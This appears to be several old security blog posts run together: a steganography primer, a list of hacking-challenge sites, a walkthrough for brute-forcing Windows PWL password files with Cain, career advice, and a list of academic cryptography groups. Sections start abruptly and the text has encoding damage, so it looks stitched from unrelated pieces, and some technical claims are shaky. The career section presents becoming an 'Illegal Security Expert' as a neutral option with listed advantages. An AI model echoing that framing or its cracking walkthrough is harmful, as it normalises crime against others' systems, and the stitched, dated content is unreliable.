You have to remember that Steganography created not to replace Cryptography but to co-operate with it. Cryptograpghy can scramble a message and create a Pseudo-random sequence of characters or bytes, but steganography is used to hide the existance of a message into another message or host object. A combination of both can create a not vissible secure communication channel.

Information technology world and the internet can really help a communication via Steganography. Many diferrent file formats , protocols and million of texts can be used to hide information between two or more parties using a public communication channel, email e.t.c. In one of Fravia’s[1] Texts related to steganography he states that it is better to store/hide important data into public places instead of your personal PC because it is more likely that public places are better maintained and second you can access it from anywhere in the world. In order to have a better understanding of how you can use this kind of technology I’ll give a real life example.

Let say that you have many passwords and you want to store them somewhere secure and not visible , so your password list wont even be a subject of attack.

Take a picture using your digital camera (I’ll tell you why use a picture of yours and not a public one later). After that download one of many free/public programs on steganography (e.g. JPHide) and store your informations inside the host image. Now put this image somewhere on the web (your website , your online photo album , even into an ebay advert). After you’ve done that you can access your password list wherever you are without anyone knows its existance.

Previously I stated that you need to use a brand new picture, this is because you can avoid Hash attacks. If you use a someone’s else picture or a famous picture (like a Dali painting) some can take your picture and create a Hash, then take the original picture and create another hash , if the two hases don’t match it means that yours is changed somehow so ppl can understand that there is a hidden informaiton isnide.

I think you can have an idea on how Steganography can be used , take the previous example and apply to diferrent scenarios (ppl can exchange innocent images or sound files but in reality the communicate using covert channels of these media)

Covert Channel

In order to hide something inside another object and make it invisible, we have to use some unused space inside the host file. For example if we want to store data inside an image using the simple technique called LSB we use the least significant bit of each pixel in one color band or in all the color bands (RGD – Red Green Blue).Least significant bit do not have a big effect on the image so even if we change them it is not possible to view a diferrence.

We can even use other domains of a host file , we can transform an image into the frequency domain and hide our information into the unused frequency transformed data. The last technique is used in order to hide information in compressed media (e.g. JPG Images)

Where we can hide data (General overview) Inside unused space in sound files mp3Stego

• Inside unused space in image files JP Hide and Seek
• In video files (Inside deferrent frames , same as image techinques)
• Inside TCP/IP unused headers
• Inside/Between File System GAPS
• Inside Executables
• Inside “Fake Spam” emails Spam Mimic
• Inside White spaces in Text files Snow

One of my favorite ways of Text steganography is using specified letters from words in order to reconstruct a message. Example : Cybernetic Individual Programmed for Hazardous Exploration and Repair take the first letter of each word and you create the word cipher.

Some of them exist for years with 1000s of players forming a society of people with related interests and some other are very new formed by friends.

This kind of puzzle is 100% related with security and people who create them try to cover as many aspects as they can from this tricky area.

Network Security ,Computer Security, Cryptography, Steganography everything you could possibly imagine.

One of the most famous challenge creator was Fravia and his students , Fravia and his Reverse Engineering school introduced the reverser’s challenge, (http://www.fravia.com), at which people were learning how to reverse engineer applications on real challenges.

Another challenge was the one that Cyberarmy created, in which thousands of people participated. Using an army hierarchy model, users depended on their ability to climb up the ranking board. Although cyberarmy isn’t just a competition arena , the people who created it they had in mind something like a computer cyber society which have as main role to spread knowledge and help people learn. The famous red library (http://library.readyresponse.org) created by the Ready Response Team (http://www.readyresponse.org/). There are several groups in there , like the special operations group etc.(http://www.cyberarmy.com/)

Another hacking challenge that is very famous is mod-x (mod-x.co.uk) created by wang. This challenge is also a big society of people trying to compete in 9 levels (at this point and probably more in the future) world. They start from very easy and they are going up to some level of difficulty. If you are ready to spend some brain waking hours (and I am talking about hours!) try any of the following and DO NOT CHEAT! :

• mod-x
• hackthissite
• ngsec
• try2hack
• hackerslab
• slyfx
• hackme.elderson
• mindlock
• cyberarmy
• roothack
• hack.datafort
• hacknull
• wargames
• osix
• h4ckerx
• bright-shadows
• 0penhack
• hackits
• thegame
• hackquest
• bigcontest.securityhack
• hackerss
• izhal
• boinasnegras
• hack4u

and many many more at : http://hackergames.net

Your passwords are stored inside your Windows directory and their extension called PWL. You can find it now , go to your Windows directory and press F3 , type in the search term -> *.pwl and you will see a list of files coming up. Your will realize that this files or file is having as filename your username or your computer’s name. “That was it.. ” you found where your passwords stored.

PWL files use RC4 encryption with 128bit key , although RC4 is good encryption, it is not very difficult to decrypt the hidden info. RC4 is been used by SSL in order to have FASTER tunneling for your important info , but why Windows need to have fast encryption ? .. No reason ! .

As you see your password is encrypted but not ! safe enough.

Next step is to find a recovery tool which can brute force your PWL file and give you the forgotten password. Plenty of them are out there free for you to use , CAIN is one (Search google for that) . Download your recovery tool and add PWL file.

Notice that you need a Username in order to start the attack , if you remember your username add it , if you don’t ! no worries , just add as user name the filename , so for example if your PWL file is called : cipher.pwl , put as username “cipher” .

That’s it , start your attack and after some time (dependes on how difficult your password was) your will have your password back.

I hope this tutorial can put you out of trouble.

The race between private and public research can prove that people are trying to get involved.

Thats why I believe that at this time is a good idea to attend a postgraduade or Undergraduate degree in this field.

IT Security can be splitted into two areas : Communication safety and Information Safety. Before entering The IT Security world you need to choose a team. After doing that you have to choose your position inside these two directions , Security Expert or Illegal Security Expert . A real life representation is be a police man or be a criminal ? Although both of these directions are challenging you need to have different characteristics to join them.

Security Expert : Positives => Access to very expensive equipment Negative => You don’t know your enemy’s techniques or tools but he does know yours.

Illegal Security Expert : Positive => Freedom to act / You know your victims tools Negative => You have to do another job to feed your self and you do not have access to top level technology.

After making your mind about the above you can use the following Academic list of security groups in and choose which one of them better fits your needs.

• Australia
  • Laboratory for Information and Network Security (Monash.Edu)
  • Centre for Computer Security Research (University of Wollongong)
  • Distributed Systems Technology Centre (QUT)
  • Centre for Advanced Computing – Algorithms and Cryptography (Macquarie)
• Austria
  • Graz University of Technology ( Institute for Applied Information Processing and Communications)
  • Kryptographie in �sterreich (Linz)
• Belgium
  • COSIC ( COmputer Security and Industrial Cryptography)
  • UCL/DICE Crypto Group
  • SCSI, Brussels Free University
• Brazil
  • Equipe de Seguran�a em Sistemas e Redes (Universidade Estadual de Campinas)
• Canada
  • University of Montreal
  • Centre For Applied Cryptographic Research (University of Waterloo)
    • Menezes :Stinson :Vanstone :Williams
  • Queen’s Cryptography and Data Security Laboratory (Queen’s University)
  • Crypto & Quantum Info Lab (McGill)
• China
  • Institute of Information Security & Privacy (Xidian University)
• Croatia
  • Cryptographic Research Center, FER, Zagreb, Croatia
• Denmark
  • Cryptology Group (BRICS, Aarhus)
    :Ivan Damg�rd
    • Ronald Cramer
• Finland
  • Laboratory of Mathematics for Information Technology (Univ of Turku)
    :Ari Renvall
  • Helsinki University of Technology
    • Helger Lipmaa :/~mjos (Markku-Juhani Saarinen)
• France
  • GRECC (Group de Recherche en Complexite et Cryptographie) (Ecole Normale Superieure in Paris)
    • Oliver Baudron :Emmanuel Bresson :Louis Granboulan :Phong Nguyen :David Pointcheval :Jacques Stern
  • CSySEC (Uni. of Pau)
  • Toulon Crypto Base
• Germany
  • Applications of Informatics in Arts and Science (Hamburg)
  • Cryptography and Security (Universit�t des Saarlandes)
  • System Security (University of Karlsruhe)
  • Mathematische Informatik (Frankfurt)
  • Bochum
    • Communication Security (COSY) (Bochum)
      :Christof Paar
    • Institute for IT-Security and Cryptology (Bochum)
  • Darmstadt
    • Cryptography and Computer Algebra (Darmstadt)
    • Number Field Cryptography (Darmstadt)
• Greece
  • ICCS Security Group
  • Joint Research Group on Communication and Information Systems Security (Uni of Aegean)
• Israel
  • Weizmann
    • Alex Biryukov :Uriel Feige :Oded Goldreich :Shafi Goldwasser :Moni Naor :Adi Shamir
• Italy
  • University of Torino
• Japan
  • System Control and Management Okamoto Lab.
  • Matsumoto Laboratory
• Korea
  • Cryptology & Information Security Laboratory (ICU.AC.KR)
  • Information & Communications Security Laboratory
  • Com2MaC (Pohang University)
  • See also
    • Korean Crypto Groups (@KRyptoGate)
• Netherlands
  • Discrete Mathematics (Eindhoven)
    • Coding and Cryptography Group (Eindhoven)
      • Andries Brouwer :Arjen Lenstra :Ruud Pellikan :Berry Schoenmakers
• Norway
  • Coding Theory and Cryptography (Bergen)
• Russia
  • SCZI (Sankt-Petersburg)
    • Research directions (In Russian)
  • Math department of Sankth-Petersburg university
    • Seminar on Cryptography (In Russian)
• Spain
  • CRISES (Rovira i Virgili)
  • Seguretat, codificaci� i transport de la informaci� (Universitats Aut�noma de Barcelona)
  • Cryptography Research group (Universitat Polit�cnica de Catalunya)
• Sweden
  • University of Lund
    • Thomas Johansson
• Switzerland
  • Information Security and Cryptography (ETH Z�rich)
  • Communication Systems (EPFL)
  • LASEC (EPFL)
• UK
  • Cambridge University
  • The LSE Computer Security Research Centre (London School of Economics and Political Science)
  • Information Security Group (Royal Holloway University of London)
  • Cryptography and Information Security Group (Bristol)

  US

  • MIT
  • Harvard

The list is been taken by Helger Lipmaa’s webpage and there is another extremely big list of all Security related information located at University of Valencia (Spain)